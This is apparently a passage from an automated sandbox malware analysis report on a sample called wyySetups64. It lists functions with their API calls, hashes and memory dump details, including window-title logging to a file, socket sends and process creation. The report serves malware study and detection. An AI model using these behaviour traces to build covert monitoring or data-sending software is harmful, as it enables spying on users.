                                                                                                                                                                                                              • Opcode ID: a3215a787de27e52e7575dd88eabcc741d4b8529f7951e666b581872d30725dd
                                                                                                                                                                                                              • Instruction ID: 14a4ea2adc091c89e9ad1d13359ef2f20572f1980277e81012a17e4eebc8fe9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3215a787de27e52e7575dd88eabcc741d4b8529f7951e666b581872d30725dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B51C076A04A449FC324DFA8D985B6AF7F5FF48710F00456EE50ADB741EB35A8008B91
                                                                                                                                                                                                              Function 03374CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,7AA29978,?,?,?,?,00000000,000000FF,00000000), ref: 03374CE6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,7AA29978,?,?,?,?,00000000,000000FF,00000000), ref: 03374D0D
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03374D21
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03374D28
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2124651672-0
                                                                                                                                                                                                              • Opcode ID: 5ff9096e333db1c975628ff7a1696bd99c5544661467a674580122c3a8f33f93
                                                                                                                                                                                                              • Instruction ID: e602834c44050d07b794edae4ab5afad60c048b1b04f4737402c538af618d29c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ff9096e333db1c975628ff7a1696bd99c5544661467a674580122c3a8f33f93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB519E76A04709DFC724EFA9E8C4A6AB7F8FB48710F04496AE95AC7740D735A400CB51
                                                                                                                                                                                                              Function 031FBD5F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_wcsrchr
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 170005318-2746444292
                                                                                                                                                                                                              • Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                                                              • Instruction ID: eff0eda059bc8f025b9396f7d49d57b0ac837b2ce4ea99a865025b0d16f04fc4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D651E871A4031D7FDB24EBA0CC85FEAB378DF18700F404595A709AA081EBB09799CF66
                                                                                                                                                                                                              Function 0337E730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E751
                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 0337E759
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,033A16F0,00000800), ref: 0337E76F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E78D
                                                                                                                                                                                                              • lstrlenW.KERNEL32(033A16F0,?,?,?,?,74DF23A0,00000000), ref: 0337E7AC
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 0337E7BD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337E804
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6BD
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6D7
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337E6F2
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0337E6FF
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0337E70A
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: CloseHandle.KERNEL32(00000000), ref: 0337E711
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0337E71E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E820
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                                                                                                                              • String ID: [
                                                                                                                                                                                                              • API String ID: 2192163267-4056885943
                                                                                                                                                                                                              • Opcode ID: b065f2517eed59f6167d24c851358613aa37d1c9e545c35b76b4f9e2355d1df5
                                                                                                                                                                                                              • Instruction ID: b6cd6c0176328781c7b8cf4732b6565582a762de165f0c4ec3fe7b9d8c360a3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b065f2517eed59f6167d24c851358613aa37d1c9e545c35b76b4f9e2355d1df5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821D375E40228FAC760EF549CC6BBA73BCFB04700F048196F984D6190DE745985CBE4
                                                                                                                                                                                                              Function 00B255C8 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 68COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID: !jWW$.$_$i$l${vU_
                                                                                                                                                                                                              • API String ID: 2102423945-3065862289
                                                                                                                                                                                                              • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                                                              • Instruction ID: dcc83845b442f0d0cf68cc4dbb1c894b4d65b2dcb754a6a16bb67e5e0f803ce0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F218870A403689AD720DF50AC80FAABBF5FF86700F0481C9E54CAA651DBB08E84CF52
                                                                                                                                                                                                              Function 03373DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373E05
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373E50
                                                                                                                                                                                                              • send.WS2_32(?,000000FF,00000000,00000000), ref: 03373E6E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 03373E81
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03373E94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373EBC
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373EC7
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373EDB
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03373F14
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 03373F51
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1701177279-0
                                                                                                                                                                                                              • Opcode ID: dc416325d085837bbf830fee97ab32c6ee8e3ecb252a5ab9181bf7921aa7f304
                                                                                                                                                                                                              • Instruction ID: e875943d1094af6f585a513b2620915abbc656f75447dfed693fe4b18d6b39ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc416325d085837bbf830fee97ab32c6ee8e3ecb252a5ab9181bf7921aa7f304
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F412676504A09DFC764DF78D8C8AA7B7F8AB48310F04896EE8AECB644D735A4419B90
                                                                                                                                                                                                              Function 00BD4F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 00BD4F43
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 00BD4F58
                                                                                                                                                                                                              • WSASetLastError.WS2_32(00002746), ref: 00BD4F6A
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 00BD4F71
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD4F9F
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD4FC7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD5005
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00BD5011
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 00BD5018
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 00BD502B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1979691958-0
                                                                                                                                                                                                              • Opcode ID: 4ce3595aa8134a96b3af01adccce2ed87a73d6450ec4708a70cdba38e020d0d3
                                                                                                                                                                                                              • Instruction ID: 2ef4256d4e7d0ebbbad83778270fb4461bcf85bac4693b24ce6b26620b1eda4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ce3595aa8134a96b3af01adccce2ed87a73d6450ec4708a70cdba38e020d0d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A141C0316006449FD730DF68D988A6AF7E9FF58314F04459AE54ECB762FB75E8408B81
                                                                                                                                                                                                              Function 03374F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03374F63
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03374F78
                                                                                                                                                                                                              • WSASetLastError.WS2_32(00002746), ref: 03374F8A
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 03374F91
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 03374FBF
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 03374FE7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03375025
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 03375031
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 03375038
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 0337504B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1979691958-0
                                                                                                                                                                                                              • Opcode ID: 8d376dd4ca137aefc5b51cc99bf6e127ab1c812fbc4ad5d1fbe5a65e8c185e2c
                                                                                                                                                                                                              • Instruction ID: 0f7010074fbf8dfbc7d0eade4c139975f2b0e7b9b0fb541e094688648083a52b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d376dd4ca137aefc5b51cc99bf6e127ab1c812fbc4ad5d1fbe5a65e8c185e2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D741D831600704DFD730EF65D9C4A6AB7EDFB49714F084A9AE44AC7641E33AF4458B41
                                                                                                                                                                                                              Function 0337C270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337C2AE
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0337C2CC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0337C309
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337C314
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0337C321
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337C345
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %s %s
                                                                                                                                                                                                              • API String ID: 1326869720-2939940506
                                                                                                                                                                                                              • Opcode ID: 7a802ce9a605028fccef6b8fb680433577e8bf8ebc22e8c36595236ccae6b36e
                                                                                                                                                                                                              • Instruction ID: 1f7ab64c71531663740b4429fb6087eb798196d59376351274e35a7c762d18bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a802ce9a605028fccef6b8fb680433577e8bf8ebc22e8c36595236ccae6b36e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5317232A40618ABEB24EB64DCC5FEF736CFB45311F40069AF605EA180DA395A44CFA5
                                                                                                                                                                                                              Function 0337C980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0337C98D
                                                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 0337C9C7
                                                                                                                                                                                                                • Part of subcall function 03377C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03377CC3
                                                                                                                                                                                                                • Part of subcall function 03377C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03377CD7
                                                                                                                                                                                                                • Part of subcall function 03377C80: FreeLibrary.KERNEL32(00000000), ref: 03377CF7
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(-00000002), ref: 0337C9E6
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0337C9F1
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337CA04
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0337CA31
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                                                                                                                              • String ID: D$WinSta0\Default
                                                                                                                                                                                                              • API String ID: 174883095-1101385590
                                                                                                                                                                                                              • Opcode ID: 3f393a63fa9d11909f8a2cbc615f5c55e5e9b673cdb65712fb486f6efdeb8d27
                                                                                                                                                                                                              • Instruction ID: 923f2c1a8c56d2976c5150c7cc3b22f80e675051fc8a3e00f86f301aea57205e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f393a63fa9d11909f8a2cbc615f5c55e5e9b673cdb65712fb486f6efdeb8d27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD11D5B6D0020877D734E7A89CC6FEFB76D9B55711F040126FA06DA284E63A9905C6A2
                                                                                                                                                                                                              Function 03378159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,A:\), ref: 03378166
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,B:\), ref: 03378176
                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033781A6
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 033781B7
                                                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 033781CE
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000AD4,?), ref: 03378204
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 03378228
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000000), ref: 03378233
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                                                                                                                              • String ID: A:\$B:\
                                                                                                                                                                                                              • API String ID: 4249875308-1009255891
                                                                                                                                                                                                              • Opcode ID: 0faeaf21af258c9a15a3dcfc88a942bf374341b3f8fbd88bc376c1751dc9800a
                                                                                                                                                                                                              • Instruction ID: 94c423bdb2305fb01596cfd232a2910bf6ff4f4276edc1efc23967403b8dc253
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0faeaf21af258c9a15a3dcfc88a942bf374341b3f8fbd88bc376c1751dc9800a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49114F71A01218EBDB24EF51DD85BEEB378EF44310F044499EA09B7240E775DA45CBA5
                                                                                                                                                                                                              Function 03379730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7AA29978,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E,00000000), ref: 03379773
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0337E1AE,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379812
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379850
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379875
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 0337989A
                                                                                                                                                                                                                • Part of subcall function 03371280: __CxxThrowException@8.LIBCMT ref: 03371290
                                                                                                                                                                                                                • Part of subcall function 03371280: DeleteCriticalSection.KERNEL32(00000000,0337D3E6,03396624,?,?,0337D3E6,?,?,?,?,03395A40,00000000), ref: 033712A1
                                                                                                                                                                                                                • Part of subcall function 0337CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0337E076,00000000,7AA29978,0337E04E,74DF2F60,00000000,?,0337E226,0339110B,000000FF,?,0337994A,0337E226), ref: 0337CE67
                                                                                                                                                                                                                • Part of subcall function 0337CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0337E08E,00000000,?,0337E226,0339110B,000000FF,?,0337994A,0337E226,?,?,?,00000000,0339125B,000000FF), ref: 0337CE83
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(0337E066,00000000), ref: 033799A0
                                                                                                                                                                                                              • timeGetTime.WINMM(?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 033799A6
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 033799B4
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 033799BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1400036169-0
                                                                                                                                                                                                              • Opcode ID: 55519ae1cdf5fa4a6433cc6418badec36d25fbedb34c0d5469ab782b0280e486
                                                                                                                                                                                                              • Instruction ID: 6b4ed3ad6a99e98baf515c66c9569f9c3fbcfe64f46b35ac58e3346d85cfa7f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55519ae1cdf5fa4a6433cc6418badec36d25fbedb34c0d5469ab782b0280e486
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A981C5B1A01A46BFE354DF6A88C4796FAA8FB08304F50422ED12CD7640D775A964CF90
                                                                                                                                                                                                              Function 00BD3500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00BD3667
                                                                                                                                                                                                                • Part of subcall function 00BD3660: _free.LIBCMT ref: 00BD369C
                                                                                                                                                                                                                • Part of subcall function 00BD3660: _malloc.LIBCMT ref: 00BD36D7
                                                                                                                                                                                                                • Part of subcall function 00BD3660: _memset.LIBCMT ref: 00BD36E5
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00BED990), ref: 00BD3565
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00BED990), ref: 00BD3573
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00BD359A
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 00BD35B3
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00BED990), ref: 00BD35EE
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00BD3621
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BD3639
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00BD3649
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
